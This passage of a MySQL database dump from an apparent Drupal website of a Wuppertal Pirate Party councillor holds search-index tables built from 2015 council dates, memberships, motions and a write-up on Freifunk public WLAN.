gebäudemanagement 25082015 bv barmen 27082015 ausschuss stadtentwicklung wirtschaft und bauen september 1092015 ausschuss für gleichstellung vertretung 5092015 heckinghausen ist bunt für alle demo 7092015 ratssitzung 13092015 oberbürgermeisterwahl 15092015 wahlausschuss 17092015 mit uns ttip ceta durchschauen 20092015 kommunales vernetzungstreffen oktober 2425102015 landesparteitag in aachen 27102015 ratssitzung 28102015 bv elberfeld 29102015 ausschuss stadtentwicklung wirtschaft und bauen november 9112015 ratssitzung 10112015 letzte ausfahrt paris 2015 ende oder wende 23112015 eröffnung lichtermarkt elberfeld weihnachtsmarkt barmen 26112015 betriebsausschuss gebäudemanagement dezember 2122015 bv elberfeld 3122015 ausschuss stadtentwicklung wirtschaft und bauen 14122015 ratssitzung jeden 2 und 4 donnerstag eines monats stammtisch im abgeordnetenbüro wichlinghauser str 61 termine ',0),(5,'node',' mitgliedschaften ich bin mitglied in folgenden organisationen asv allgemeiner sportverein wuppertal ev adac allgemeiner deutscher automobilclub ev musikpiraten ev nag neue assekuranz gewerkschaft piratenpartei nrw piko nrw ev ',0),(6,'node',' anträge diese anträge habe ich in zusammenarbeit mit anderen fraktionen miteingereicht 30092014 ja zur kommunalen selbstverwaltung und zur kommunalen daseinsvorsorge 10022015 aufhebung des ratsbeschlusses zum verkauf des carnaper platzes 22062015 öffentliches wlan in wuppertal fördern freifunkstandorte auf städtischen gebäuden einrichten anträge talrat ',0),(7,'node',' freifunk ich bin schon seit jahren ein fan der freifunk idee ich betreibe seit märz 2015 den freifunk node im oberen fischertal ffollital in zusammenarbeit mit freifunk wuppertal hat die fraktion bündnis 90 die grünen einen antrag in den rat eingebracht um das freie internet in wuppertal zu fördern das gebäudemanagement hat dem antrag vorbehaltlich der kostenfrage am 16042015 zugestimmt der stadtrat hat den antrag am 11022015 an den stadtentwicklungsauschuss sitzung 1106 verwiesen da die verwaltung aber bis dahin das geforderte rechtliche gutachten vorlegen konnte haben wir den antrag deshalb auf die ausschusssitzung im august vertagt der landtag nrw hat am 25062015 beschlossen die dachflächen der landeseigenen gebäuden dem freifunk rheinland ev zur verfügung zu stellen am 19082015 gab das gmw überraschend in einer pressekonferenz bekannt 850 standorte für router zur verfügung zu stellen in der ratssitzung vom 7092015 wurde dies auch formell einstimmig beschlossen hier sieht man die auslastung der router in utopiastadt beim trassenfest am 19042015 sehr deutlich 150 clients waren zeitweise gleichzeitig verbunden es ist natürlich jedermensch freigestellt einen eigenen freifunk node bei sich zu hause zu betreiben je dichter die vermaschung ist desto wirksamer ist das ganze system vielen dank an lukas lamla babak tubis und ralf glörfeld die mit ihren antworten und erklärungen viel zu meinem verständnis des themas beigetragen haben linksammlung bericht der aktuellen stunde zum landtagsbeschluss freifunk in arnsberg realisiert arnsberg info städte die freifunk aktiv unterstützen freifunk forum stromverbrauch freifunk stuttgart stromkosten freifunk kiel strahlungsbelastung aktionsprogramm umwelt und gesundheit nrw sprach und datenübertragung per funk bluetooth und wlan bundesamt für strahlungsschutz freifunkantrag der piratenfraktion im landtag nrw freifunk rheinland ev 350 neue wlanstandorte für wien orf at so bekommt wuppertal wlan wznewsline ',0); /*!40000 ALTER TABLE `search_dataset` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `search_index` -- DROP TABLE IF EXISTS `search_index`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `search_index` ( `word` varchar(50) NOT NULL DEFAULT '' COMMENT 'The search_total.word that is associated with the search item.', `sid` int(10) unsigned NOT NULL DEFAULT '0' COMMENT 'The search_dataset.sid of the searchable item to which the word belongs.', `type` varchar(16) NOT NULL COMMENT 'The search_dataset.type of the searchable item to which the word belongs.', `score` float DEFAULT NULL COMMENT 'The numeric score of the word, higher being more important.', PRIMARY KEY (`word`,`sid`,`type`), KEY `sid_type` (`sid`,`type`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Stores the search index, associating words, items and...'; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `search_index` -- LOCK TABLES `search_index` WRITE; /*!40000 ALTER TABLE `search_index` DISABLE KEYS */; INSERT INTO `search_index` VALUES ('10022015',4,'node',1),('10022015',6,'node',1),('10062015',4,'node',0.938382),('10112015',4,'node',0.740689),('1092015',4,'node',0.805455),('11022015',4,'node',1),('11022015',7,'node',1),('11052015',4,'node',1),('1106',7,'node',1),('11062015',4,'node',1.86576),('1122014',4,'node',1),('13',4,'node',0.824901),('13052015',4,'node',1),('13062015',4,'node',0.923838),('13092015',4,'node',0.781775),('14042015',4,'node',1),('14122015',4,'node',0.707906),('150',7,'node',0.997306),('15092015',4,'node',0.779231),('15122014',4,'node',1),('16042015',7,'node',1),('16062015',4,'node',1.79893),('17042015',4,'node',1),('17082015',4,'node',0.816452),('17092015',4,'node',0.776703),('18012015',4,'node',1),('18042015',4,'node',1),('19042015',4,'node',1),('19042015',7,'node',1),('19052015',4,'node',1),('19082015',7,'node',1),('19122014',4,'node',1),('2',4,'node',0.703756),('20052015',4,'node',0.993146),('20082015',4,'node',0.813674),('20092015',4,'node',0.76431),('2015',4,'node',2.5509),('2015',7,'node',1),('20151',4,'node',3.68173),('21052015',4,'node',0.972861),('21112014',4,'node',1),('2122015',4,'node',0.712106),('22062015',4,'node',0.879565),('22062015',6,'node',1),('23042015',4,'node',1),('23072015',4,'node',0.851346),('23112014',4,'node',1),('23112015',4,'node',0.725015),('24022015',4,'node',1),('24062015',4,'node',0.876337),('2425102015',4,'node',0.757065),('25022015',4,'node',1),('25032015',4,'node',1),('25062015',7,'node',1),('25072015',4,'node',0.848323),('25082015',4,'node',0.810915),('26032015',4,'node',2),('26072015',4,'node',0.842342),('26112014',4,'node',2),('26112015',4,'node',0.718502),('27082015',4,'node',0.808176),('27102015',4,'node',0.752312),('2801',4,'node',1),('28042014',4,'node',1),('28072015',4,'node',0.839384),('28102015',4,'node',0.749958),('29042015',4,'node',1),('29062015',4,'node',0.863659),('29102015',4,'node',0.747619),('30',4,'node',6.93388),('30042015',4,'node',1),('30052015',4,'node',0.968904),('30092014',6,'node',1),('3032015',4,'node',1),('3122014',4,'node',1),('3122015',4,'node',0.71),('350',7,'node',8.48867),('4',4,'node',0.7017),('4062015',4,'node',0.961087),('419',4,'node',0.866793),('5092015',4,'node',0.797402),('6052015',4,'node',1),('6062015',4,'node',0.953396),('61',4,'node',0.685676),('70',4,'node',1),('7092015',4,'node',0.784336),('7092015',7,'node',1),('850',7,'node',1),('90',3,'node',1),('90',7,'node',1),('9022015',4,'node',1),('9032015',4,'node',1),('9062015',4,'node',0.942091),('9112015',4,'node',0.742984),('9122014',4,'node',1),('aachen',4,'node',0.754681),('aber',7,'node',1),('abgeordnetenbüro',4,'node',0.691597),('adac',5,'node',1),('adhs',4,'node',2),('aidshilfe',4,'node',1),('aktionsprogramm',7,'node',8.86),('aktiv',7,'node',9.10533),('aktuellen',7,'node',9.36481),('alle',4,'node',0.786915),('allgemeiner',5,'node',2),('allgemeines',3,'node',26),('anderen',6,'node',1),('angst',4,'node',0.913226),('antrag',7,'node',4),('anträge',6,'node',38),('antworten',7,'node',0.882818),('april',4,'node',4),('arnsberg',7,'node',18.402),('assekuranz',5,'node',1),('asv',5,'node',1),('auch',7,'node',1),('auf',6,'node',11),('auf',7,'node',1),('aufhebung',6,'node',11),('auftaktveranstaltung',4,'node',1),('august',4,'node',3.27699),('august',7,'node',1),('aus',4,'node',1),('ausbau',4,'node',0.869951),('auschuss',3,'node',1),('ausfahrt',4,'node',0.736141),('auslastung',7,'node',1),('ausschuss',4,'node',5.99246),('ausschüsse',4,'node',1),('ausschusssitzung',7,'node',1),('ausstellung',4,'node',1.82713),('automobilclub',5,'node',1),('babak',7,'node',0.902857),('barmen',4,'node',6.42229),('bauen',3,'node',1),('bauen',4,'node',6.03803),('bedingungsloses',4,'node',0.886095),('befreiung',4,'node',1),('befreiungsfest',4,'node',1),('beginn',4,'node',0.860547),('behinderung',4,'node',1),('bei',4,'node',1),('bei',7,'node',0.953396),('beigetragen',7,'node',0.860547),('beim',7,'node',1),('beirat',4,'node',1),('bekannt',7,'node',1),('bekommt',7,'node',8.35411),('beratendes',3,'node',1),('bericht',7,'node',9.3983),('beschlossen',7,'node',2),('beteiligungssteuerung',4,'node',1),('betreibe',7,'node',1),('betreiben',7,'node',0.942091),('betriebsauschuss',3,'node',1),('betriebsauschuss',4,'node',1.81092),('betriebsausschuss',4,'node',0.716357),('bin',5,'node',1),('bin',7,'node',1),('bis',7,'node',1),('bluetooth',7,'node',8.65606),('bundesamt',7,'node',8.59953),('bundesparteitag',4,'node',1.68471),('bündnis',3,'node',1),('bündnis',7,'node',1),('bunt',4,'node',0.78951),('bürgerbegehren',4,'node',1),('bürgerticket',4,'node',0.976851),('bürgerverein',4,'node',1),('carnaper',4,'node',1),('carnaper',6,'node',11),('ceta',4,'node',0.769219),('clients',7,'node',0.993146),('dachflächen',7,'node',1),('dahin',7,'node',1),('dank',7,'node',0.913226),('das',4,'node',0.98493),('das',7,'node',4.92384),('daseinsvorsorge',6,'node',11),('datenübertragung',7,'node',8.74229),('dem',7,'node',2),('demo',4,'node',1.69408),('den',4,'node',1),('den',7,'node',5),('der',3,'node',3),('der',4,'node',6.85746),('der',7,'node',24.8809),('des',4,'node',1),('des',6,'node',22),('des',7,'node',0.866793),('deshalb',7,'node',1),('desto',7,'node',0.931053),('deutlich',7,'node',1),('deutscher',5,'node',1),('dezember',4,'node',2.8569),('dichter',7,'node',0.938382),('die',3,'node',1),('die',4,'node',0.830633),('die',7,'node',16.9261),('dies',7,'node',1),('diese',6,'node',1),('diskussionsveranstaltung',4,'node',0.989021),('dokumentation',4,'node',1),('donnerstag',4,'node',0.699655),('durchschauen',4,'node',0.766757),('düsseldorf',4,'node',0.906287),('eigenen',7,'node',0.957226),('ein',4,'node',0.889397),('ein',7,'node',1),('einen',7,'node',1.95723),('einer',7,'node',1),('eines',4,'node',0.697623),('eingebracht',7,'node',1),('einrichten',6,'node',11),('einstimmig',7,'node',1),('elberfeld',4,'node',7.11298),('ende',4,'node',0.731649),('erklärungen',7,'node',0.879565),('eröffnung',4,'node',1.72283),('fällt',4,'node',1),('fan',7,'node',1),('februar',4,'node',4),('ffollital',7,'node',1),('filmpremiere',4,'node',1),('finanzen',4,'node',1),('fischertal',7,'node',1),('folgenden',5,'node',1),('fördern',6,'node',11),('fördern',7,'node',11),('förderverein',4,'node',1),('formell',7,'node',1),('forum',7,'node',9.04272),('fraktion',3,'node',1),('fraktion',7,'node',1),('fraktionen',6,'node',1),('freie',7,'node',11),('freifunk',7,'node',84.7244),('freifunkantrag',7,'node',8.54373),('freifunkstandorte',6,'node',11),('freigestellt',7,'node',0.961087),('freiheit',4,'node',0.920273),('funk',7,'node',8.68461),('für',3,'node',1),('für',4,'node',2.4232),('für',7,'node',17.979),('gab',7,'node',1),('ganze',7,'node',0.923838),('gebäudemanagement',3,'node',1),('gebäudemanagement',4,'node',2.52514),('gebäudemanagement',7,'node',1),('gebäuden',6,'node',11),('gebäuden',7,'node',1),('gedenkfeier',4,'node',1),('geforderte',7,'node',1),('gegen',4,'node',1),('gemeinsame',4,'node',1),('gesamtschule',4,'node',1),('gespräch',4,'node',0.927431),('gesundheit',7,'node',8.80075),('gewerkschaft',5,'node',1),('gleichstellung',4,'node',0.802752),('gleichzeitig',7,'node',0.980874),('glörfeld',7,'node',0.889397),('gmw',7,'node',1),('graf',3,'node',1),('grundeinkommen',4,'node',0.882818),('grünen',3,'node',1),('grünen',7,'node',1),('gutachten',7,'node',1),('habe',6,'node',1),('haben',7,'node',1.85746),('hat',7,'node',4),('hause',7,'node',0.945829),('heckinghausen',4,'node',0.794753),('hier',7,'node',11),('ich',5,'node',1),('ich',6,'node',1),('ich',7,'node',2),('idee',7,'node',1),('ihren',7,'node',0.886095),('info',7,'node',9.16882),('infotermin',4,'node',0.899454),('infoveranstaltung',4,'node',0.873132),('internet',7,'node',11),('ist',4,'node',0.792123),('ist',7,'node',2.82775),('jahren',7,'node',1),('jahrestag',4,'node',1),('januar',4,'node',4),('jeden',4,'node',0.705825),('jedermensch',7,'node',0.96498),('juli',4,'node',3.41756),('juni',4,'node',3.85992),('kiel',7,'node',8.92007),('kindern',4,'node',1),('kommunalen',6,'node',22),('kommunales',4,'node',1.71148),('konnte',7,'node',1),('kostenfrage',7,'node',1),('kreismitgliederversammlung',4,'node',1),('lamla',7,'node',0.906287),('landeseigenen',7,'node',1),('landesparteitag',4,'node',2.75468),('landtag',7,'node',9.48867),('landtagsbeschluss',7,'node',9.26577),('langerfeld',4,'node',2),('letzte',4,'node',0.738408),('lichtermarkt',4,'node',0.722831),('linksammlung',7,'node',0.857458),('live',4,'node',0.957226),('lukas',7,'node',0.909743),('mai',4,'node',4),('man',7,'node',1),('mandatsträgertreffen',4,'node',0.945829),('märz',4,'node',4),('märz',7,'node',1),('meinem',7,'node',0.873132),('menschen',4,'node',1),('mit',4,'node',2.67027),('mit',6,'node',1),('mit',7,'node',1.8861),('miteingereicht',6,'node',1),('mitglied',3,'node',4),('mitglied',5,'node',1),('mitgliedschaften',5,'node',26),('monats',4,'node',0.695602),('musikpiraten',5,'node',1),('nag',5,'node',1),('nationalsozialismus',4,'node',1),('natürlich',7,'node',0.968904),('neue',5,'node',1),('neue',7,'node',8.46141),('neujahrsempfang',4,'node',1),('node',7,'node',1.9534),('nordbahntrasse',4,'node',1),('november',4,'node',2.98118),('nrw',5,'node',2),('nrw',7,'node',18.2601),('oberbürgermeisterwahl',4,'node',1.60699),('oberen',7,'node',1),('oder',4,'node',0.729424),('offenen',4,'node',1),('öffentliches',6,'node',11),('offiz',4,'node',1),('oktober',4,'node',3.03786),('olli',3,'node',1),('orf',7,'node',8.38068),('organisationen',5,'node',1),('paris',4,'node',0.733888),('per',7,'node',8.71335),('piko',5,'node',1),('piratenfraktion',7,'node',8.51611),('piratenpartei',3,'node',1),('piratenpartei',5,'node',1),('platzes',4,'node',1),('platzes',6,'node',11),('podiumsdiskussion',4,'node',0.896076),('pressekonferenz',7,'node',1),('ralf',7,'node',0.892724),('rat',3,'node',1),('rat',7,'node',1),('ratsbeschlusses',6,'node',11),('ratssitzung',4,'node',7.66826),('ratssitzung',7,'node',1),('ratssondersitzung',4,'node',2),('realisiert',7,'node',9.20091),('rechtliche',7,'node',1),('rheinland',7,'node',9.48867),('router',7,'node',2),('schon',7,'node',1),('sehr',7,'node',1),('seilbahnprojekt',4,'node',2.81722),('seit',7,'node',2),('selbstverwaltung',6,'node',11),('september',4,'node',4.04388),('sich',7,'node',0.949597),('sieht',7,'node',1),('sitzung',7,'node',1),('solidarische',4,'node',0.980874),('sommerferien',4,'node',0.857458),('sondersitzung',4,'node',2.84832),('sportverein',5,'node',1),('sprach',7,'node',8.77142),('stadt',3,'node',1),('städte',7,'node',9.13696),('stadtentwicklung',3,'node',1),('stadtentwicklung',4,'node',6.03803),('stadtentwicklungsauschuss',7,'node',1),('städtischen',6,'node',11),('stadtrat',7,'node',1),('stadtverordneter',3,'node',1),('stammtisch',4,'node',0.693594),('standorte',7,'node',1),('statt',4,'node',0.916736),('stawibau',3,'node',1),('stawibau',4,'node',2),('stellen',7,'node',2),('stigma',4,'node',1),('str',4,'node',0.687638),('strahlungsbelastung',7,'node',8.88993),('strahlungsschutz',7,'node',8.57154),('stromkosten',7,'node',8.95041),('stromverbrauch',7,'node',9.01173),('stunde',7,'node',9.33156),('stuttgart',7,'node',8.98097),('system',7,'node',0.920273),('tag',4,'node',1),('talrat',6,'node',11),('termine',4,'node',33.521),('thema',4,'node',1),('themas',7,'node',0.863659),('trassenfest',7,'node',1),('ttip',4,'node',0.771698),('tubis',7,'node',0.899454),('tür',4,'node',1),('über',4,'node',0.892724),('überraschend',7,'node',1),('umwelt',7,'node',8.83027),('und',3,'node',1),('und',4,'node',10.6672),('und',6,'node',11),('und',7,'node',27.9464),('uns',4,'node',0.774192),('unterstützen',7,'node',9.07391),('utopiastadt',7,'node',1),('verbunden',7,'node',0.976851),('verfügung',7,'node',2),('verkauf',4,'node',1),('verkauf',6,'node',11),('vermaschung',7,'node',0.934703),('vernetzungstreffen',4,'node',0.76188),('verständnis',7,'node',0.869951),('vertagt',7,'node',1),('vertretung',4,'node',0.800068),('verwaltung',7,'node',1),('verwiesen',7,'node',1),('vetretung',4,'node',1),('viel',7,'node',0.876337),('vielen',7,'node',0.916736),('vom',4,'node',1),('vom',7,'node',1),('vorbehaltlich',7,'node',1),('vorlegen',7,'node',1),('wahlausschuss',4,'node',1.61315),('waren',7,'node',0.989021),('weihnachtsmarkt',4,'node',0.72066),('wende',4,'node',0.727213),('wichlinghauser',4,'node',0.689612),('wien',7,'node',8.40741),('wir',7,'node',1),('wirksamer',7,'node',0.927431),('wirtschaft',3,'node',1),('wirtschaft',4,'node',6.03803),('wlan',6,'node',11),('wlan',7,'node',16.9554),('wlanstandorte',7,'node',8.43432),('wuppertal',3,'node',1),('wuppertal',4,'node',8.93388),('wuppertal',5,'node',1),('wuppertal',6,'node',11),('wuppertal',7,'node',20.3277),('wurde',7,'node',1),('wznewsline',7,'node',8.32772),('zeitweise',7,'node',0.98493),('zugestimmt',7,'node',1),('zum',4,'node',1),('zum',6,'node',11),('zum',7,'node',9.29854),('zur',6,'node',22),('zur',7,'node',2),('zusammenarbeit',6,'node',1),('zusammenarbeit',7,'node',1); /*!40000 ALTER TABLE `search_index` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `search_node_links` -- DROP TABLE IF EXISTS `search_node_links`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `search_node_links` ( `sid` int(10) unsigned NOT NULL DEFAULT '0' COMMENT 'The search_dataset.sid of the searchable item containing the link to the node.', `type` varchar(16) NOT NULL DEFAULT '' COMMENT 'The search_dataset.type of the searchable item containing the link to the node.', `nid` int(10) unsigned NOT NULL DEFAULT '0' COMMENT 'The node.nid that this item links to.', `caption` longtext COMMENT 'The text used to link to the node.nid.', PRIMARY KEY (`sid`,`type`,`nid`), KEY `nid` (`nid`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Stores items (like nodes) that link to other nodes, used...'; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `search_node_links` -- LOCK TABLES `search_node_links` WRITE; /*!40000 ALTER TABLE `search_node_links` DISABLE KEYS */; /*!40000 ALTER TABLE `search_node_links` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `search_total` -- DROP TABLE IF EXISTS `search_total`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `search_total` ( `word` varchar(50) NOT NULL DEFAULT '' COMMENT 'Primary Key: Unique word in the search index.', `count` float DEFAULT NULL COMMENT 'The count of the word in the index using Zipf’s law to equalize the probability distribution.', PRIMARY KEY (`word`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Stores search totals for words.'; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `search_total` -- LOCK TABLES `search_total` WRITE; /*!40000 ALTER TABLE `search_total` DISABLE KEYS */; INSERT INTO `search_total` VALUES ('10022015',0.176091),('10062015',0.30103),('10112015',0.30103),('1092015',0.30103),('11022015',0.176091),('11052015',0.30103),('1106',0.30103),('11062015',0.186384),('1122014',0.30103),('13',0.30103),('13052015',0.30103),('13062015',0.30103),('13092015',0.30103),('14042015',0.30103),('14122015',0.30103),('150',0.30103),('15092015',0.30103),('15122014',0.30103),('16042015',0.30103),('16062015',0.191978),('17042015',0.30103),('17082015',0.30103),('17092015',0.30103),('18012015',0.30103),('18042015',0.30103),('19042015',0.176091),('19052015',0.30103),('19082015',0.30103),('19122014',0.30103),('2',0.30103),('20052015',0.30103),('20082015',0.30103),('20092015',0.30103),('2015',0.107759),('20151',0.104355),('21052015',0.30103),('21112014',0.30103),('2122015',0.30103),('22062015',0.18527),('23042015',0.30103),('23072015',0.30103),('23112014',0.30103),('23112015',0.30103),('24022015',0.30103),('24062015',0.30103),('2425102015',0.30103),('25022015',0.30103),('25032015',0.30103),('25062015',0.30103),('25072015',0.30103),('25082015',0.30103),('26032015',0.176091),('26072015',0.30103),('26112014',0.176091),('26112015',0.30103),('27082015',0.30103),('27102015',0.30103),('2801',0.30103),('28042014',0.30103),('28072015',0.30103),('28102015',0.30103),('29042015',0.30103),('29062015',0.30103),('29102015',0.30103),('30',0.0585093),('30042015',0.30103),('30052015',0.30103),('30092014',0.30103),('3032015',0.30103),('3122014',0.30103),('3122015',0.30103),('350',0.0483657),('4',0.30103),('4062015',0.30103),('419',0.30103),('5092015',0.30103),('6052015',0.30103),('6062015',0.30103),('61',0.30103),('70',0.30103),('7092015',0.193245),('850',0.30103),('90',0.176091),('9022015',0.30103),('9032015',0.30103),('9062015',0.30103),('9112015',0.30103),('9122014',0.30103),('aachen',0.30103),('aber',0.30103),('abgeordnetenbüro',0.30103),('adac',0.30103),('adhs',0.176091),('aidshilfe',0.30103),('aktionsprogramm',0.0464432),('aktiv',0.0452548),('aktuellen',0.0440624),('alle',0.30103),('allgemeiner',0.176091),('allgemeines',0.0163904),('anderen',0.30103),('angst',0.30103),('antrag',0.09691),('anträge',0.011281),('antworten',0.30103),('april',0.09691),('arnsberg',0.0229814),('assekuranz',0.30103),('asv',0.30103),('auch',0.30103),('auf',0.0347621),('aufhebung',0.0377886),('auftaktveranstaltung',0.30103),('august',0.091248),('aus',0.30103),('ausbau',0.30103),('auschuss',0.30103),('ausfahrt',0.30103),('auslastung',0.30103),('ausschuss',0.0670248),('ausschüsse',0.30103),('ausschusssitzung',0.30103),('ausstellung',0.189576),('automobilclub',0.30103),('babak',0.30103),('barmen',0.062848),('bauen',0.0576985),('bedingungsloses',0.30103),('befreiung',0.30103),('befreiungsfest',0.30103),('beginn',0.30103),('behinderung',0.30103),('bei',0.179531),('beigetragen',0.30103),('beim',0.30103),('beirat',0.30103),('bekannt',0.30103),('bekommt',0.0491023),('beratendes',0.30103),('bericht',0.043913),('beschlossen',0.176091),('beteiligungssteuerung',0.30103),('betreibe',0.30103),('betreiben',0.30103),('betriebsauschuss',0.132182),('betriebsausschuss',0.30103),('bin',0.176091),('bis',0.30103),('bluetooth',0.0474797),('bundesamt',0.0477753),('bundesparteitag',0.202373),('bündnis',0.176091),('bunt',0.30103),('bürgerbegehren',0.30103),('bürgerticket',0.30103),('bürgerverein',0.30103),('carnaper',0.0347621),('ceta',0.30103),('clients',0.30103),('dachflächen',0.30103),('dahin',0.30103),('dank',0.30103),('das',0.0679037),('daseinsvorsorge',0.0377886),('datenübertragung',0.0470359),('dem',0.176091),('demo',0.201477),('den',0.0669468),('der',0.0123253),('des',0.0178257),('deshalb',0.30103),('desto',0.30103),('deutlich',0.30103),('deutscher',0.30103),('dezember',0.130343),('dichter',0.30103),('die',0.0225579),('dies',0.30103),('diese',0.30103),('diskussionsveranstaltung',0.30103),('dokumentation',0.30103),('donnerstag',0.30103),('durchschauen',0.30103),('düsseldorf',0.30103),('eigenen',0.30103),('ein',0.184484),('einen',0.179244),('einer',0.30103),('eines',0.30103),('eingebracht',0.30103),('einrichten',0.0377886),('einstimmig',0.30103),('elberfeld',0.0571288),('ende',0.30103),('erklärungen',0.30103),('eröffnung',0.198778),('fällt',0.30103),('fan',0.30103),('februar',0.09691),('ffollital',0.30103),('filmpremiere',0.30103),('finanzen',0.30103),('fischertal',0.30103),('folgenden',0.30103),('fördern',0.0193052),('förderverein',0.30103),('formell',0.30103),('forum',0.0455523),('fraktion',0.176091),('fraktionen',0.30103),('freie',0.0377886),('freifunk',0.00509595),('freifunkantrag',0.0480706),('freifunkstandorte',0.0377886),('freigestellt',0.30103),('freiheit',0.30103),('funk',0.0473318),('für',0.0198323),('gab',0.30103),('ganze',0.30103),('gebäudemanagement',0.0867113),('gebäuden',0.0347621),('gedenkfeier',0.30103),('geforderte',0.30103),('gegen',0.30103),('gemeinsame',0.30103),('gesamtschule',0.30103),('gespräch',0.30103),('gesundheit',0.0467397),('gewerkschaft',0.30103),('gleichstellung',0.30103),('gleichzeitig',0.30103),('glörfeld',0.30103),('gmw',0.30103),('graf',0.30103),('grundeinkommen',0.30103),('grünen',0.176091),('gutachten',0.30103),('habe',0.30103),('haben',0.187061),('hat',0.09691),('hause',0.30103),('heckinghausen',0.30103),('hier',0.0377886),('ich',0.09691),('idee',0.30103),('ihren',0.30103),('info',0.0449571),('infotermin',0.30103),('infoveranstaltung',0.30103),('internet',0.0377886),('ist',0.105937),('jahren',0.30103),('jahrestag',0.30103),('januar',0.09691),('jeden',0.30103),('jedermensch',0.30103),('juli',0.111466),('juni',0.100051),('kiel',0.0461465),('kindern',0.30103),('kommunalen',0.0193052),('kommunales',0.199835),('konnte',0.30103),('kostenfrage',0.30103),('kreismitgliederversammlung',0.30103),('lamla',0.30103),('landeseigenen',0.30103),('landesparteitag',0.134502),('landtag',0.0435151),('landtagsbeschluss',0.04451),('langerfeld',0.176091),('letzte',0.30103),('lichtermarkt',0.30103),('linksammlung',0.30103),('live',0.30103),('lukas',0.30103),('mai',0.09691),('man',0.30103),('mandatsträgertreffen',0.30103),('märz',0.0791812),('meinem',0.30103),('menschen',0.30103),('mit',0.0718724),('miteingereicht',0.30103),('mitglied',0.0791812),('mitgliedschaften',0.0163904),('monats',0.30103),('musikpiraten',0.30103),('nag',0.30103),('nationalsozialismus',0.30103),('natürlich',0.30103),('neue',0.0436344),('neujahrsempfang',0.30103),('node',0.179531),('nordbahntrasse',0.30103),('november',0.125624),('nrw',0.0209237),('oberbürgermeisterwahl',0.210126),('oberen',0.30103),('oder',0.30103),('offenen',0.30103),('öffentliches',0.0377886),('offiz',0.30103),('oktober',0.123584),('olli',0.30103),('orf',0.0489551),('organisationen',0.30103),('paris',0.30103),('per',0.0471839),('piko',0.30103),('piratenfraktion',0.0482182),('piratenpartei',0.176091),('platzes',0.0347621),('podiumsdiskussion',0.30103),('pressekonferenz',0.30103),('ralf',0.30103),('rat',0.176091),('ratsbeschlusses',0.0377886),('ratssitzung',0.0474164),('ratssondersitzung',0.176091),('realisiert',0.0448081),('rechtliche',0.30103),('rheinland',0.0435151),('router',0.176091),('schon',0.30103),('sehr',0.30103),('seilbahnprojekt',0.131926),('seit',0.176091),('selbstverwaltung',0.0377886),('september',0.0959664),('sich',0.30103),('sieht',0.30103),('sitzung',0.30103),('solidarische',0.30103),('sommerferien',0.30103),('sondersitzung',0.130682),('sportverein',0.30103),('sprach',0.0468878),('stadt',0.30103),('städte',0.045106),('stadtentwicklung',0.0576985),('stadtentwicklungsauschuss',0.30103),('städtischen',0.0377886),('stadtrat',0.30103),('stadtverordneter',0.30103),('stammtisch',0.30103),('standorte',0.30103),('statt',0.30103),('stawibau',0.124939),('stellen',0.176091),('stigma',0.30103),('str',0.30103),('strahlungsbelastung',0.0462949),('strahlungsschutz',0.047923),('stromkosten',0.045998),('stromverbrauch',0.0457009),('stunde',0.0442117),('stuttgart',0.0458495),('system',0.30103),('tag',0.30103),('talrat',0.0377886),('termine',0.0127664),('thema',0.30103),('themas',0.30103),('trassenfest',0.30103),('ttip',0.30103),('tubis',0.30103),('tür',0.30103),('über',0.30103),('überraschend',0.30103),('umwelt',0.0465915),('und',0.00849693),('uns',0.30103),('unterstützen',0.0454036),('utopiastadt',0.30103),('verbunden',0.30103),('verfügung',0.176091),('verkauf',0.0347621),('vermaschung',0.30103),('vernetzungstreffen',0.30103),('verständnis',0.30103),('vertagt',0.30103),('vertretung',0.30103),('verwaltung',0.30103),('verwiesen',0.30103),('vetretung',0.30103),('viel',0.30103),('vielen',0.30103),('vom',0.176091),('vorbehaltlich',0.30103),('vorlegen',0.30103),('wahlausschuss',0.20949),('waren',0.30103),('weihnachtsmarkt',0.30103),('wende',0.30103),('wichlinghauser',0.30103),('wien',0.0488078),('wir',0.30103),('wirksamer',0.30103),('wirtschaft',0.0576985),('wlan',0.0152638),('wlanstandorte',0.0486605),('wuppertal',0.0101566),('wurde',0.30103),('wznewsline',0.0492494),('zeitweise',0.30103),('zugestimmt',0.30103),('zum',0.0199266),('zur',0.0177288),('zusammenarbeit',0.176091); /*!40000 ALTER TABLE `search_total` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `semaphore` -- DROP TABLE IF EXISTS `semaphore`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `semaphore` ( `name` varchar(255) NOT NULL DEFAULT '' COMMENT 'Primary Key: Unique name.', `value` varchar(255) NOT NULL DEFAULT '' COMMENT 'A value for the semaphore.', `expire` double NOT NULL COMMENT 'A Unix timestamp with microseconds indicating when the semaphore should expire.', PRIMARY KEY (`name`), KEY `value` (`value`), KEY `expire` (`expire`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Table for holding semaphores, locks, flags, etc. that...'; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `semaphore` -- LOCK TABLES `semaphore` WRITE; /*!40000 ALTER TABLE `semaphore` DISABLE KEYS */; /*!40000 ALTER TABLE `semaphore` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `sequences` -- DROP TABLE IF EXISTS `sequences`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `sequences` ( `value` int(10) unsigned NOT NULL AUTO_INCREMENT COMMENT 'The value of the sequence.', PRIMARY KEY (`value`) ) ENGINE=InnoDB AUTO_INCREMENT=17 DEFAULT CHARSET=utf8 COMMENT='Stores IDs.'; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `sequences` -- 